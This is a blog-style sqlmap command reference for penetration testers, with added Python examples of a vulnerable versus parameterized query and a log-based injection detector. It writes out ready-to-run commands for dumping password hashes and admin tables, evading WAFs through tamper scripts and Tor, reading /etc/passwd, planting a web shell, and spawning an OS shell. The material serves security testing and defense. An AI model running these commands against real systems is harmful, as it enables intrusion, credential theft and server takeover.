
Mastering sqlmap: A Comprehensive Guide for Advanced SQL Injection Techniques

The Ultimate sqlmap Command Reference: Advanced Techniques for Penetration Testing


**Disclaimer:** This article is intended for educational purposes and authorized security testing only. Unauthorized use of sqlmap against systems without explicit written consent is illegal. The author assumes no responsibility for any misuse or damage caused by the tools and techniques described herein. Always ensure you have proper permissions before performing any security assessment.


---


## Introduction


[sqlmap](https://sqlmap.org/) is the de‑facto standard for automated SQL injection detection and exploitation. Whether you are a penetration tester, a bug bounty hunter, or a security enthusiast, mastering sqlmap can dramatically accelerate your workflow. Yet, many users only scratch the surface – they use `--dbs`, `--tables`, and `--dump`, but rarely venture into the vast array of advanced options that can bypass WAFs, handle complex authentication, and even pop an OS shell.


This blog post is a comprehensive reference guide that covers everything from basic enumeration to advanced tamper scripts, performance tuning, and file system access. I have compiled this command sheet after years of real‑world testing, and I hope it becomes your go‑to resource whenever you need to squeeze every drop of power from sqlmap.


Let’s dive in.


---


## 1. Basic Syntax and Target Specification


At its core, sqlmap requires a target URL or a request file. The simplest command is:


```bash
sqlmap -u "http://example.com/page.php?id=1"
```


But you can also feed it raw HTTP requests (e.g., from Burp Suite) to handle complex sessions:


```bash
sqlmap -r request.txt
```


For POST requests, use the `--data` flag:


```bash
sqlmap -u "http://example.com/login" --data="user=admin&pass=123"
```


If you have multiple targets, use the `-m` option with a file containing one URL per line. You can even leverage Google dorks to discover potential targets:


```bash
sqlmap -g "inurl:product.php?id="
```


**Pro tip:** Always use the `--batch` flag to avoid interactive prompts when you want automated scanning.


---


## 2. Request Manipulation – Headers, Cookies, and Proxies


Real‑world applications often require authentication, custom headers, or request throttling. sqlmap offers fine‑grained control over these aspects.


| Need | Command |
|------|---------|
| Set a cookie | `--cookie="PHPSESSID=abc123"` |
| Randomize User‑Agent | `--random-agent` |
| Add custom headers | `--headers="X-Forwarded-For: 127.0.0.1"` |
| Use HTTP Basic Auth | `--auth-type=Basic --auth-cred="user:pass"` |
| Route through a proxy | `--proxy="http://127.0.0.1:8080"` |
| Use Tor | `--tor --tor-type=SOCKS5` |
| Add delay between requests | `--delay=2` |
| Increase connection timeout | `--timeout=10` |


When you are facing rate‑limiting or a fragile application, a combination of `--delay`, `--retries`, and `--timeout` can prevent failures and detection.


---


## 3. Enumeration – Extracting Data Efficiently


Once sqlmap confirms an injection point, you can start enumerating the database. Below are the essential commands for gathering information.


### Database, Users, and Privileges


```bash
# Current database name
sqlmap -u URL --current-db

# List all databases
sqlmap -u URL --dbs

# Current database user
sqlmap -u URL --current-user

# Check if you have DBA (admin) privileges
sqlmap -u URL --is-dba

# List all database users and their password hashes
sqlmap -u URL --users --passwords
```


### Tables, Columns, and Data


```bash
# List tables in a specific database
sqlmap -u URL -D target_db --tables

# List columns in a specific table
sqlmap -u URL -D target_db -T users --columns

# Dump the entire table
sqlmap -u URL -D target_db -T users --dump

# Dump only a limited number of rows
sqlmap -u URL -D target_db -T users --dump --start=1 --stop=50

# Dump specific columns only
sqlmap -u URL -D target_db -T users --dump -C "username,password,email"
```


You can also use `--search` to find tables or columns containing specific names, and `--sql-query` to run arbitrary SQL statements – perfect for data mining.


---


## 4. Injection Techniques and Detection


By default, sqlmap tests all techniques (Boolean‑based blind, error‑based, union query, stacked queries, and time‑based blind). However, you can force a specific technique to speed up testing or when you know which one works best.


| Technique | Flag |
|-----------|------|
| Boolean‑based blind | `B` |
| Error‑based | `E` |
| Union query | `U` |
| Stacked queries | `S` |
| Time‑based blind | `T` |


Example – use only time‑based blind with a higher sleep time:


```bash
sqlmap -u URL --technique=T --time-sec=10
```


### Level and Risk


- **`--level`** (1–5): Increases the depth of testing. Higher levels test more parameters (e.g., HTTP headers, cookies) and deeper injection points.

- **`--risk`** (1–3): Increases the aggressiveness. Risk 3 may use `OR` injections that can potentially alter data, so use with caution.


For a thorough test, use:


```bash
sqlmap -u URL --level=5 --risk=3
```


### Handling Special Injection Points


sqlmap tests every GET/POST parameter it finds by default; to restrict testing to a single parameter (for example when the vulnerable one is not `id`), name it with `-p`. If the injection sits in a more complex context (e.g., inside a JSON payload), you may need to supply a `--prefix` and `--suffix` so that the injected payload completes the surrounding query correctly.
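To see what techniques `B` and `U` actually test for, and why a validated, bound parameter stops both, here is an added example that is not from the post: it runs the TRUE/FALSE and UNION probes against a concatenated query and a parameterized one in SQLite. The `news` table and the `make_db` helper are constructed stand-ins for the `page.php?id=1` target.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the page.php?id=1 target in the post."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?)",
                    [(1, "first"), (2, "second"), (3, "third")])
    return con

def lookup_vulnerable(con, id_param):
    # The request value is pasted into the SQL text, so it can carry a condition
    # or a whole extra statement fragment.
    return con.execute(f"SELECT title FROM news WHERE id = {id_param}").fetchall()

def lookup_parameterized(con, id_param):
    # Validate the type first, then bind: the value is data and is never parsed
    # as SQL. Binding alone would already neutralise the probes below; the int()
    # check additionally rejects junk input instead of querying with it.
    try:
        wanted = int(id_param)
    except ValueError:
        return []
    return con.execute("SELECT title FROM news WHERE id = ?", (wanted,)).fetchall()

def boolean_blind_differs(lookup, con):
    """Reproduce the signal behind technique B: does a TRUE condition appended
    to id=1 produce a different response than a FALSE one?"""
    return lookup(con, "1 AND 1=1") != lookup(con, "1 AND 1=2")

def union_leaks(lookup, con):
    """Reproduce technique U: can the injected value append rows from elsewhere?
    Here the schema table is used as the 'elsewhere'."""
    rows = lookup(con, "1 UNION SELECT name FROM sqlite_master")
    return any(r[0] == "news" for r in rows)
```

With `lookup_vulnerable` both checks return True, which is exactly the behaviour sqlmap's detection phase looks for; with `lookup_parameterized` both return False and the legitimate `id=1` lookup still works.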


---


## 5. Performance Tuning


Large‑scale scanning can be slow. Use these optimizations:


- **`--threads`** – Increase the number of concurrent HTTP requests (max 10).

- **`--predict-output`** – Use common value prediction to speed up enumeration.

- **`--keep-alive`** – Reuse HTTP connections.

- **`--null-connection`** – Retrieve only page length, not the full body (faster).

- **`--hex`** – Use hex representation to avoid encoding issues and sometimes speed up data retrieval.


Example of a fast, aggressive scan:


```bash
sqlmap -u URL --threads=10 --level=3 --risk=2 --hex --batch
```


---


## 6. Advanced WAF Bypass with Tamper Scripts


One of sqlmap's most powerful features is its tamper scripts. These modify the payloads to evade WAFs, IPS, and input filters. You can chain multiple tamper scripts together by separating them with commas.


### Commonly Used Tamper Scripts


| Script | Description |
|--------|-------------|
| `space2comment` | Replace spaces with `/**/` |
| `between` | Use `BETWEEN` instead of `=` |
| `randomcase` | Randomise keyword case |
| `charencode` | URL‑encode all characters |
| `versionedmorekeywords` | Use MySQL versioned keywords |
| `ifnull2ifisnull` | Rewrite `IFNULL` to `IF(ISNULL())` |
| `plus2concat` | Convert `+` to `CONCAT()` |
| `nonrecursivereplacement` | Replace SQL keywords with alternatives |


**Example WAF bypass command:**


```bash
sqlmap -u URL --tamper=space2comment,between,randomcase --random-agent --delay=1
```


If you face a stubborn WAF, experiment with different combinations. Note that `--skip-waf` does not bypass the WAF itself; it only skips sqlmap's own heuristic WAF/IPS detection phase.


---


## 7. File System Access and OS Shell


When you have **FILE** privileges on the database, you can read and write files on the server. This is a game‑changer for post‑exploitation.


### Read a file


```bash
sqlmap -u URL --file-read="/etc/passwd"
```


### Write a file (e.g., a web shell)


```bash
sqlmap -u URL --file-write="/tmp/shell.php" --file-dest="/var/www/html/shell.php"
```


### OS Command Execution


If the DBMS supports stacked queries and you have sufficient privileges, you can spawn an interactive OS shell:


```bash
sqlmap -u URL --os-shell
```


This is often the ultimate goal of a SQL injection attack, but remember – it is also the most damaging and should only be performed with explicit authorization.
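The probes described in sections 4, 6 and 7 (time-based and union payloads, the `space2comment`/`randomcase`/`charencode` evasions, `LOAD_FILE` reads) are also what a defender looks for in web server access logs. The following is an added example, not part of the post: it undoes those evasions on each request path and flags the technique in use. The log lines and the sqlmap User-Agent string are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache/nginx "combined" log format, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2025:10:00:02 +0000] "GET /page.php?id=1%20AND%20SLEEP(10) HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2025:10:00:03 +0000] "GET /page.php?id=1/**/AnD/**/1234=1234 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2025:10:00:04 +0000] "GET /page.php?id=1%20UNION%20SELECT%20LOAD_FILE(%27/etc/passwd%27) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# One signature per technique / post-exploitation step covered in the post.
SIGNATURES = {
    "time-based": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b"),
    "union": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "boolean": re.compile(r"\b(and|or)\s+\d+\s*(=|between)\s*\d+"),
    "file-access": re.compile(r"\bload_file\s*\(|\binto\s+(out|dump)file\b"),
}

def normalize(path):
    """Undo the tamper evasions: URL decoding until stable (charencode), inline
    comments collapsed to a space (space2comment), lower case (randomcase)."""
    decoded = path
    while (nxt := unquote_plus(decoded)) != decoded:   # decode until nothing changes
        decoded = nxt
    no_comments = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", no_comments).lower()

def classify(line):
    """Return {'ip', 'path', 'hits'} for a parsable line, None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = normalize(m.group("path"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    # --random-agent defeats this check; the payload signatures above do not rely on it.
    if "sqlmap" in m.group("ua").lower():
        hits.append("sqlmap-agent")
    return {"ip": m.group("ip"), "path": m.group("path"), "hits": hits}

def scan(log_text):
    """All lines that triggered at least one signature, in log order."""
    results = (classify(line) for line in log_text.splitlines())
    return [r for r in results if r and r["hits"]]
```

Run against real logs, the `ip` field plus the request rate is what turns single hits into an alert; a `--delay` of a few seconds only spreads the same signatures over more time.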


---


## 8. Advanced Usage Examples


To tie everything together, here are some real‑world scenarios with full command lines.


### Scenario 1: Full Database Enumeration Behind a WAF


```bash
sqlmap -u "https://target.com/news?id=1" \
    --random-agent \
    --tamper=space2comment,between \
    --delay=2 \
    --threads=3 \
    --level=3 \
    --risk=2 \
    --batch \
    --dbs
```


### Scenario 2: Dump Admin Users from a Specific Table


```bash
sqlmap -u "https://target.com/view.php?id=5" \
    -D corporate_db \
    -T administrators \
    --dump \
    --where="role='superadmin'" \
    -C "id,username,password_hash,email" \
    --hex --no-cast
```


### Scenario 3: Using a Burp Request with Authentication


```bash
sqlmap -r burp_request.txt \
    --cookie="PHPSESSID=xyz" \
    --headers="X-Custom: value" \
    --level=2 \
    --technique=BEU \
    --batch
```


### Scenario 4: Time‑Based Blind Only for a Slow Connection


```bash
sqlmap -u "https://target.com/search?q=test" \
    --technique=T \
    --time-sec=15 \
    --delay=5 \
    --retries=2
```


### Scenario 5: OS Shell via SQL Injection


```bash
sqlmap -u "https://target.com/page?id=1" --os-shell --batch
```


---


## 9. Troubleshooting Common Issues


Even with the best preparation, you may encounter errors. Here’s a quick checklist:


| Symptom | Solution |
|---------|----------|
| **403 Forbidden** | Use `--random-agent`, `--tamper=space2comment`, `--delay`, and rotate proxies with `--proxy` (or `--proxy-file` for a list). |
| **WAF blocks every request** | Try multiple tamper scripts, increase `--delay`, raise `--timeout` so slow responses are not treated as failures, and consider `--tor`. |
| **Enumeration is extremely slow** | Increase `--threads`, use `--hex`, and restrict techniques to the fastest working one. |
| **Garbled or empty output** | Use `--hex` and `--no-cast`; also specify the correct `--dbms`. |
| **Session corruption** | Reset with `--flush-session` to start fresh. |
| **No injection found** | Increase `--level` and `--risk`, or manually provide `--prefix` and `--suffix` based on your observations. |


---


## 10. Final Thoughts


sqlmap is an incredibly versatile tool that can save hours of manual exploitation. However, its true power lies in knowing which options to combine for each specific target. The command sheet provided in this article covers the vast majority of use cases you will encounter in the field.


Remember to always:

- Obtain written permission before testing.

- Use `--batch` for automation, but understand the implications.

- Keep your sqlmap version updated – new tamper scripts and features are added regularly.


I hope this reference serves you well on your security assessments. Happy (and ethical) hacking!


---


**Further Reading:**

- [Official sqlmap Documentation](https://github.com/sqlmapproject/sqlmap/wiki)

- [sqlmap Tamper Scripts List](https://github.com/sqlmapproject/sqlmap/tree/master/tamper)


*If you found this guide helpful, share it with your fellow pentesters and leave a comment below with your own favorite sqlmap tricks!*



©2025-26 BY VIPHACKER.100 | ARYAN AHIRWAR
